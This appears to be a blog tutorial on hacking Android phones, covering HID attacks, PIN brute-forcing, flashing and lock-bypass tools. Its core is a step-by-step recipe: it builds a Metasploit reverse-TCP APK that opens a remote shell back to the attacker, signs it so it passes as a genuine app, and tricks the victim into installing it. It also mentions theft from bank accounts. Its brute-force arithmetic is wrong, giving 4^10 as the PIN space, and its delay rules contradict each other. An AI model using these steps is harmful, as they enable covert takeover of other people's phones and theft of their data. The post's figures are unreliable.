I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.
The methods used by attackers to exploit android phones are increasing. People are busy finding new vulnerabilities to exploit. Below are a few ways to hack Android phones:
The HID attack is a scenario in which an attacker takes a programmable embedded development platform, such as an associated software package like SET (Social Engineering Toolkit), Metasploit, etc., or uses other phones and USB's which are programmed to be a RubberDucky and execute an attack.
In such an attack, the hacker installs a backdoor, and by using that, he completely downloads the target's information.
Using the information, he can either hack into the bank account of the person or even sell them on the dark web.
You can see how a hid attack is conducted from the
A brute-force attack uses the trial and error method to guess the correct password of the phone.
Some important points to consider to conduct such an attack:
After 5 Wrong pin's - 30 sec delay After 1 Wrong pin's - 30 sec delay After 41 Wrong pin's - 30 sec delay
The number of passwords:
The total number of possible combinations for a 4 digit numeric lock can start from 4 zeros to 4 nines which means 0000-9999, so we have about :
4^10 amount of password or 1048576 passwords in total
Let's see some possibilities for our understanding:
Possibility # 1: 5 passwords wrong, a delay of 30 seconds. We need to find out how many times we get the delay in the first place and find the total time consumed.
total delay 1048576/5 = 209715.2 times total time 209715.2 * 30 = 6291456 sec or 1747.6266 hours
Possibility # 2: 41 passwords wrong, delay 30 sec.
total delays 1048576 / 41 = 25,575.0243 delays total time consumed 25575.0243 * 30 = 7,67,250.729 sec or 767250.729 / 60 = 12,787.5121 min or 12,787.51215 hours
You can see it is almost impossible to find the person's phone's password by brute-forcing. You will be dead by the time you find the phone's password 😣.
Payloads are simple scripts that help a hacker hack a system. So now, if I just trick the person into authorizing and installing the .apk file, which opens a back door for Meterpreter to listen on for a connection to get the system under its control.
meterpreter reverse tcp payload creation command:
msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apk
Payload is -p, LHOST Localhost IP to receive a back connection (Check yours with if-config command), LPORT Localhost port on which the connection listen for the victim (we set it to 4444), R Raw format (we select .apk).
We need to provide a certificate to the .apk file to give it an identity. We need to sign a cert for a .apk file to give it recognition as an application. Without this, the .apk file will be recognized as a virus.
To assign a cert, you must follow these steps
Sign the .apk file locally:
keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
Keytool making Keystore:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked
Signing a .apk file with JARsigner:
jarsigner -verify -verbose -certs android_shell.apk
Install and use Zipalign:
sudo apt-get install zipalign or sudo apt install zipalign
zipalign -v 4 android_shell.apk singed_jar.apk
Now run the command for that is in the Metasploit console:
And set the various parameters in Metasploit like the lhost, lport, etc. Now you need to run the command after setting the host and port type:
type: run (and press enter)
After you execute this code, you will receive a connection to the target system. Using this, you can access the whole system and gain full access.
A flashed phone is a device where a different ROM/operating system has been flashed on top of the system that came with the phone. Often, phones can be flashed to appear unlocked, whereas, in reality, they are still carrier-branded phones that will not be compatible with our service.
For every phone, there are different methods for factory reset, the most common is to do it via the volume buttons and the power button. For example, I have an old oppo phone for which the factory reset combination is down volume button and power button and for 5 seconds and the phone is flashed.
Bypass is a commonly used method by law enforcement like the CIA, FBI & in India, the IB & RAW use a special device as shown in the picture.
In such kind of attack's it mainly depends on the attacker using the IP_BOX, which works mainly on the bruteforcing of the target. This is mainly used by law enforcement to get into the phones of terrorist's cybercriminals and other criminals' phones.
You can use another tool known as the BashBunny from hak5. This is a mini-computer from which u can conduct a login Bruteforce attack. Unlike the other options above, this is a serious beast in its work. In a matter of hours, you can crack the most difficult of difficult passwords with ease.
This tutorial is for educational purposes only. Dont try this and get into trouble.
Create your free account to unlock your custom reading experience.